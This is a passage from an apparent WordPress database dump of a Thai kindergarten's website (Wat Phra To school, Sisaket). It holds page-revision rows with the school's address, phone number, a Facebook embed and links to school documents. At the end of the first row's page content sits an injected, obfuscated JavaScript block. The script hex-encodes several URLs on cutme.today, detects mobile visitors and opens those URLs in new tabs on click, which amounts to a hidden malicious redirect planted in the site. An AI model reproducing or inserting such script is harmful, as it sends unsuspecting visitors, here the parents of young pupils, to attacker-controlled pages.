{\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-29 09:20:50','2024-08-29 02:20:50','',19,'http://watprato.ssk.in.th/?p=250',0,'revision','',0),
(252,2,'2024-08-29 09:52:01','2024-08-29 02:52:01','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" 